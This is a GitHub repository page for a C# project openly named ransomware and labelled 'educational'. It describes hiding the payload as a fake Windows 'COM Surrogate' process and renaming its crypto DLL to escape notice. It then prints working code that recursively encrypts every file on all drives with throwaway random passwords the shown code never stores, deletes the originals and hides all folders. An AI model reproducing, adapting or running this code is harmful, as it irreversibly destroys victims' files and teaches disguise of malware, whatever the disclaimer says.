Skip to content

Ransomware is a project written in C# 4.7 and shows how ransomeware generally works. This repository should be used for educational reasons only!!

License

Notifications You must be signed in to change notification settings

Abraham313/Ransomware

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Ransomware

Ransomware is a project written in C# 4.7 and shows how ransomeware generally works. This repository should be used for educational reasons only!!

Build status GitHub issues GitHub forks GitHub stars GitHub license

Folders

The Setup folder contains a Inno Setup script and the installer.

The BeforeSetup folder contains the files the setup installs.

The Projects folder contains the C# source code.

The stuff behind

The LustigeFehler.exe file is the main exe. It will start and show some nonsense error messages.

If it's not run in admin mode, it will crash with an error. If the .exe is started in admin mode, it will start up a new hidden (can't be seen in the taskbar or as GUI) process called COM Surrogate in the background.

Why COM Surrogate? - Because noone will ever expect a standard Windows process is running as a virus. In the background, the our Fake COM Surrogate.exe will run and try to encrypt all files on all drives it finds.

Additionally, it will hide all folders it finds. Furthermore, the AES crypto library is obfuscated to the name msvpc.dll to avoid that suspicious users (who take a look into the install folder) get more suspicious.

How is this possible? - The following lines of code taken from Main.cs show the main ransomware code.

private string GetRandomPassword()
{
   var alg = SHA512.Create();
   alg.ComputeHash(Encoding.UTF8.GetBytes(DateTime.Now.ToLongDateString() + _random.Next(int.MaxValue)));
   return BitConverter.ToString(alg.Hash);
}

private void Run()
{
   foreach (var drive in DriveInfo.GetDrives())
   {
      try
      {
         EncryptFs(drive.Name);
      }
      catch
      {
         // ignored
      }
   }
}

private void EncryptFs(string directory)
{
   foreach (var file in Directory.GetFiles(directory))
   {
      try
      {
         if (file == null) continue;
         Msvpc.UseE(GetRandomPassword(), file,
            Path.Combine(directory, Path.GetFileNameWithoutExtension(file)) + Resources.Ending);
         File.Delete(file);
      }
      catch
      {
         // ignored
      }
   }

   foreach (var dir in Directory.GetDirectories(directory))
   {
      HideDirectory(dir);
      EncryptFs(dir);
   }
}

private void HideDirectory(string dir)
{
   var di = new DirectoryInfo(dir);
   if ((di.Attributes & FileAttributes.Hidden) != FileAttributes.Hidden)
   {
      di.Attributes |= FileAttributes.Hidden;
   }
}

private bool IsElevated()
{
   var id = WindowsIdentity.GetCurrent();
   return id.Owner != id.User;
}

Virustotal.com scans

Well, let's see what virustotal.com shows us as information on this "virus":

Hint

Please don't try this software on your PC. It's for educational purposes only!!!!!!

Change history

  • Version 1.0.0.0 (2018-01-08) : 1.0 release.

About

Ransomware is a project written in C# 4.7 and shows how ransomeware generally works. This repository should be used for educational reasons only!!

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 72.5%
  • Inno Setup 27.5%